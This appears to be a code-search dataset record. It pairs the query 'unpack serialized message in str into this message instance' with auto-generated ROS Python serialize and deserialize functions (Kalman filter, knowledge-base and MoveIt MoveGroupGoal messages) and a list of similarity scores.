_x.predict.prior_state_cov.cols))\n length = len(self.predict.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.prior_state_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols))\n length = len(self.predict.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.post_state_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols))\n length = len(self.update.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.prior_state_cov.data))\n length = len(self.update.prior_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.prior_obs_error))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols))\n length = len(self.update.obs_error_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.obs_error_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols))\n length = len(self.update.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.post_state_cov.data))\n length = len(self.update.state_delta)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.state_delta))\n length = len(self.update.post_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.post_obs_error))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols))\n length = len(self.update.obs_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.obs_jacobian.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols))\n length = len(self.update.obs_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.obs_noise_cov.data))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.namespace\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.prefixes)\n buff.write(_struct_I.pack(length))\n for val1 in self.prefixes:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.prefix\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.imports)\n buff.write(_struct_I.pack(length))\n for val1 in self.imports:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val1))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val1))\n _x = self.address.room_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.floor_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.city_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v1 = val1.header\n buff.write(_struct_I.pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v3 = val1.size\n _x = _v3\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v4 = val1.pose\n _v5 = _v4.position\n _x = _v5\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v6 = _v4.orientation\n _x = _v6\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n _x = val1.part_of\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.actions)\n buff.write(_struct_I.pack(length))\n for val1 in self.actions:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.asserted))\n _x = val1.object_acted_on\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.subactions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.subactions:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val2))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = val1\n buff.write(_struct_bB.pack(_x.quantification, _x.unordered))\n length = len(self.object_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.object_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.value_type))\n _x = val1.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_6d2I2iB().pack(_x.x, _x.y, _x.z, _x.yaw, _x.v_des, _x.a_des, _x.t_start.secs, _x.t_start.nsecs, _x.duration.secs, _x.duration.nsecs, _x.relative))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def to_buffer(self) -> bytearray:\n packet = bytearray()\n packet.extend(\n struct.pack(\n \"!ccccHH\",\n \"D\".encode(\"ascii\"),\n \"L\".encode(\"ascii\"),\n \"E\".encode(\"ascii\"),\n \"P\".encode(\"ascii\"),\n int(self.type),\n self.len,\n )\n )\n return packet" ]
[ "0.6972838", "0.6802016", "0.6796291", "0.67317253", "0.66948694", "0.66847515", "0.6658851", "0.6626311", "0.66227144", "0.6618303", "0.6607444", "0.65361035", "0.6529462", "0.65220654", "0.64863104", "0.6467052", "0.64530367", "0.6438432", "0.6427743", "0.6426063", "0.63947827", "0.637155", "0.6370058", "0.63681626", "0.6365958", "0.63556087", "0.635341", "0.6336435", "0.6329306", "0.6322275", "0.63218606", "0.63185257", "0.6306401", "0.62988025", "0.6281811", "0.6272117", "0.62678283", "0.6263905", "0.626265", "0.6260801", "0.6259295", "0.62568295", "0.62566996", "0.62555534", "0.6250422", "0.6249969", "0.6216801", "0.62154055", "0.6210305", "0.62070805", "0.62065965", "0.6200813", "0.6192115", "0.6191173", "0.6176995", "0.6174274", "0.61577916", "0.6152228", "0.61469287", "0.6144135", "0.61402714", "0.6133335", "0.61313534", "0.6130928", "0.6127834", "0.61178756", "0.6117536", "0.6114875", "0.61143404", "0.61098206", "0.6100491", "0.6100394", "0.6096276", "0.6087428", "0.6085069", "0.60646605", "0.6061217", "0.6061037", "0.60604405", "0.6055247", "0.6047422", "0.6044676", "0.604425", "0.604425", "0.60435164", "0.60401994", "0.6039911", "0.6038519", "0.6036742", "0.6035997", "0.6029169", "0.60147244", "0.60146034", "0.6014108", "0.60076547", "0.60048294", "0.59783775", "0.5971153", "0.59585917", "0.59584385", "0.5954125" ]
0.0
-1
unpack serialized message in str into this message instance
def deserialize(self, str): try: if self.header is None: self.header = std_msgs.msg.Header() if self.goal_id is None: self.goal_id = actionlib_msgs.msg.GoalID() if self.goal is None: self.goal = moveit_msgs.msg.MoveGroupGoal() end = 0 _x = self start = end end += 12 (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.header.frame_id = str[start:end].decode('utf-8') else: self.header.frame_id = str[start:end] _x = self start = end end += 8 (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal_id.id = str[start:end].decode('utf-8') else: self.goal_id.id = str[start:end] _x = self start = end end += 12 (_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.workspace_parameters.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.workspace_parameters.header.frame_id = str[start:end] _x = self start = end end += 60 (_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs,) = _get_struct_6d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.position = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.velocity = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.effort = struct.unpack(pattern, str[start:end]) _x = self start = end end += 12 (_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v149 = val1.translation _x = _v149 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v150 = val1.rotation _x = _v150 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v151 = val1.linear _x = _v151 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v152 = val1.angular _x = _v152 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v153 = val1.force _x = _v153 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v154 = val1.torque _x = _v154 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v155 = val1.object _v156 = _v155.header start = end end += 4 (_v156.seq,) = _get_struct_I().unpack(str[start:end]) _v157 = _v156.stamp _x = _v157 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v156.frame_id = str[start:end].decode('utf-8') else: _v156.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v155.id = str[start:end].decode('utf-8') else: _v155.id = str[start:end] _v158 = _v155.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v158.key = str[start:end].decode('utf-8') else: _v158.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v158.db = str[start:end].decode('utf-8') else: _v158.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = struct.unpack(pattern, str[start:end]) _v155.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v159 = val3.position _x = _v159 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v160 = val3.orientation _x = _v160 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = _get_struct_3I().unpack(str[start:end]) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v155.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v161 = val3.position _x = _v161 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v162 = val3.orientation _x = _v162 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = _get_struct_4d().unpack(str[start:end]) _v155.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v163 = val3.position _x = _v163 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v164 = val3.orientation _x = _v164 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v155.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v165 = val3.position _x = _v165 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v166 = val3.orientation _x = _v166 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.subframe_poses.append(val3) start = end end += 1 (_v155.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v167 = val1.detach_posture _v168 = _v167.header start = end end += 4 (_v168.seq,) = _get_struct_I().unpack(str[start:end]) _v169 = _v168.stamp _x = _v169 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v168.frame_id = str[start:end].decode('utf-8') else: _v168.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v167.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v167.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v167.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = struct.unpack(pattern, str[start:end]) _v170 = val3.time_from_start _x = _v170 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v167.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.request.start_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.request.start_state.is_diff = bool(self.goal.request.start_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.goal_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v171 = val2.header start = end end += 4 (_v171.seq,) = _get_struct_I().unpack(str[start:end]) _v172 = _v171.stamp _x = _v172 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v171.frame_id = str[start:end].decode('utf-8') else: _v171.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v173 = val2.target_point_offset _x = _v173 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v174 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = struct.unpack(pattern, str[start:end]) _v174.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v175 = val4.position _x = _v175 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v176 = val4.orientation _x = _v176 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v174.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = _get_struct_3I().unpack(str[start:end]) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v174.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v177 = val4.position _x = _v177 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v178 = val4.orientation _x = _v178 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v174.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v179 = val2.header start = end end += 4 (_v179.seq,) = _get_struct_I().unpack(str[start:end]) _v180 = _v179.stamp _x = _v180 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v179.frame_id = str[start:end].decode('utf-8') else: _v179.frame_id = str[start:end] _v181 = val2.orientation _x = _v181 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v182 = val2.target_pose _v183 = _v182.header start = end end += 4 